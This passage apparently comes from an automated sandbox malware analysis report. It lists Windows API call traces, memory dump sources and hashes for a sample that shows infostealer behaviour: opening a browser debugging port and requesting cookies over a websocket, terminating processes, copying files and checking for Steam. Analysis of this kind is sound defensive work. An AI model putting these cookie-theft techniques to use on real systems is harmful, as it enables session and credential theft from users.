                                • lstrcat.KERNEL32(00000000,?), ref: 006C9889
                                • lstrcat.KERNEL32(00000000,006F4B60), ref: 006C989B
                                • memset.MSVCRT ref: 006C98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006C98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C9903
                                • StrStrA.SHLWAPI(00000000,00F204D8), ref: 006C9919
                                • lstrcpyn.KERNEL32(008F93D0,00000000,00000000), ref: 006C9938
                                • lstrlen.KERNEL32(?), ref: 006C994B
                                • wsprintfA.USER32 ref: 006C995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 006C9971
                                • Sleep.KERNEL32(00001388), ref: 006C99E7
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C92E1
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C92FA
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C9399
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C93E6
                                  • Part of subcall function 006E4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006E4759
                                  • Part of subcall function 006E4740: Process32First.KERNEL32(00000000,00000128), ref: 006E4769
                                  • Part of subcall function 006E4740: Process32Next.KERNEL32(00000000,00000128), ref: 006E477B
                                  • Part of subcall function 006E4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E479C
                                  • Part of subcall function 006E4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006E47AB
                                  • Part of subcall function 006E4740: CloseHandle.KERNEL32(00000000), ref: 006E47B2
                                  • Part of subcall function 006E4740: Process32Next.KERNEL32(00000000,00000128), ref: 006E47C0
                                  • Part of subcall function 006E4740: CloseHandle.KERNEL32(00000000), ref: 006E47CB
                                • CloseDesktop.USER32(?), ref: 006C9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 412001530d699b65cbba34520e079a63f68fe6548fd13df746c14b0f618f9507
                                • Instruction ID: 74dc14af113910f17d0acd40a90b2cfc4861647f95fe8a1c504a31d16803c948
                                • Opcode Fuzzy Hash: 412001530d699b65cbba34520e079a63f68fe6548fd13df746c14b0f618f9507
                                • Instruction Fuzzy Hash: 6A9152B1910218AFDB50DBB4DC49FEE77B9FF44700F104599FA09A7291DE70AA44CBA4
                                APIs
                                • wsprintfA.USER32 ref: 006DE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DE243
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DE263
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DE27D
                                • wsprintfA.USER32 ref: 006DE2A2
                                • StrCmpCA.SHLWAPI(?,006ECFEC), ref: 006DE2B4
                                • wsprintfA.USER32 ref: 006DE2D1
                                  • Part of subcall function 006DEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006DEE12
                                • wsprintfA.USER32 ref: 006DE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006DE304
                                • lstrcat.KERNEL32(?,00F20BA8), ref: 006DE335
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DE347
                                • lstrcat.KERNEL32(?,?), ref: 006DE358
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DE36A
                                • lstrcat.KERNEL32(?,?), ref: 006DE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006DE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE422
                                • DeleteFileA.KERNEL32(?), ref: 006DE45C
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006DE49B
                                • FindClose.KERNEL32(00000000), ref: 006DE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 3a7eefaf27bffa1512f8c6ff3380857c59088ef477082f4f323a3eb018948c5f
                                • Instruction ID: 6dd942fad098d5a14304cb7974b5498254e76a3ee8cac1c7401bd62104a712e4
                                • Opcode Fuzzy Hash: 3a7eefaf27bffa1512f8c6ff3380857c59088ef477082f4f323a3eb018948c5f
                                • Instruction Fuzzy Hash: 9F814E71900219ABCB60EFB5DC49EFE77BAFF84300F004599B94A97251DE35AA45CFA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C16E2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C176C
                                • lstrcat.KERNEL32(00000000), ref: 006C1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: da7468f6b6fb455a2ec3dfdbd7395f4013fab37e5fe2d7d7c1abcd1436346ef1
                                • Instruction ID: a0d65a61c0efca2ce2cf3182f3f499c310c568eb53df3a68c66c64fa5f646e25
                                • Opcode Fuzzy Hash: da7468f6b6fb455a2ec3dfdbd7395f4013fab37e5fe2d7d7c1abcd1436346ef1
                                • Instruction Fuzzy Hash: E7812E7191161A9BCB61EFA6D899FBE77B6FF46300F04012CF8099B252CB349D41CBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006DDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006DDD4C
                                • wsprintfA.USER32 ref: 006DDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DDD79
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DDD9C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DDDB6
                                • wsprintfA.USER32 ref: 006DDDD4
                                • DeleteFileA.KERNEL32(?), ref: 006DDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006DDDED
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                  • Part of subcall function 006DD980: memset.MSVCRT ref: 006DD9A1
                                  • Part of subcall function 006DD980: memset.MSVCRT ref: 006DD9B3
                                  • Part of subcall function 006DD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DD9DB
                                  • Part of subcall function 006DD980: lstrcpy.KERNEL32(00000000,?), ref: 006DDA0E
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,00000000), ref: 006DDA1C
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,00F205B0), ref: 006DDA36
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,?), ref: 006DDA4A
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,00F1F020), ref: 006DDA5E
                                  • Part of subcall function 006DD980: lstrcpy.KERNEL32(00000000,?), ref: 006DDA8E
                                  • Part of subcall function 006DD980: GetFileAttributesA.KERNEL32(00000000), ref: 006DDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006DDE2E
                                • FindClose.KERNEL32(00000000), ref: 006DDE3D
                                • lstrcat.KERNEL32(?,00F20BA8), ref: 006DDE66
                                • lstrcat.KERNEL32(?,00F1F1A0), ref: 006DDE7A
                                • lstrlen.KERNEL32(?), ref: 006DDE84
                                • lstrlen.KERNEL32(?), ref: 006DDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DDED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 862e9b2d2f7a529702a04be762b8ac6e7c74f38b18b5048821b5d42c668540c6
                                • Instruction ID: 3511f92b548c591a8fd86fdb829f147bfe1fb704d614691f8ea1bf59c591b569
                                • Opcode Fuzzy Hash: 862e9b2d2f7a529702a04be762b8ac6e7c74f38b18b5048821b5d42c668540c6
                                • Instruction Fuzzy Hash: F5612E71910209ABCB60EBB5DC99EFE77BAFF88300F0045A9F94997251DF34AA54CB50
                                APIs
                                • wsprintfA.USER32 ref: 006DD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DD564
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DD584
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DD59E
                                • lstrcat.KERNEL32(?,00F20BA8), ref: 006DD5E3
                                • lstrcat.KERNEL32(?,00F20CD8), ref: 006DD5F7
                                • lstrcat.KERNEL32(?,?), ref: 006DD60B
                                • lstrcat.KERNEL32(?,?), ref: 006DD61C
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DD62E
                                • lstrcat.KERNEL32(?,?), ref: 006DD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006DD737
                                • FindClose.KERNEL32(00000000), ref: 006DD746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 31135874d0ad6f44aa8ebe2279fba7a68e91592e1382dfb339b71e3f87286241
                                • Instruction ID: 2bc5e95005e24ae33c5e4ba060ece2006abe042601e5853f386bd13fc879a0ef
                                • Opcode Fuzzy Hash: 31135874d0ad6f44aa8ebe2279fba7a68e91592e1382dfb339b71e3f87286241
                                • Instruction Fuzzy Hash: 4B612FB1910119ABCB60EFB5DC88EEE77B9FF48300F0045A9EA4997351DE34AA44CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: b3a19339da339b811591a03b62e01508b0e5db74b0befe874e1134fb21a580ed
                                • Instruction ID: 64213055c452378c7d304a445b339aa10172db637efcb34d0d0fa356e0ce57b4
                                • Opcode Fuzzy Hash: b3a19339da339b811591a03b62e01508b0e5db74b0befe874e1134fb21a580ed
                                • Instruction Fuzzy Hash: 5EA25971D022A99FDB60CFA9C840BEDBBB6BF48304F1481AAD509A7341DB715E85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D2402
                                • lstrlen.KERNEL32(\*.*), ref: 006D240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006D2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: $r}$Agvy$A}z$D3z{$OnO$R.}$S;w$T"x$XO_$;IL
                                • API String ID: 0-569549136
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006E46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 006E46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006E4711
                                • CloseHandle.KERNEL32(00000000), ref: 006E4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E4726
                                • CloseHandle.KERNEL32(00000000), ref: 006E4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 006E4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 006E4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E4672
                                • CloseHandle.KERNEL32(00000000), ref: 006E467D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4B7F
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BA7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: A_$!;&$*=_$2\$8Xr$8Xr$Pm}_$i}w
                                • API String ID: 0-3036884518
                                APIs
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006E2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006E2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006E2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006E2DEC
                                • LocalFree.KERNEL32(00000000), ref: 006E2FCA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                Memory Dump Source
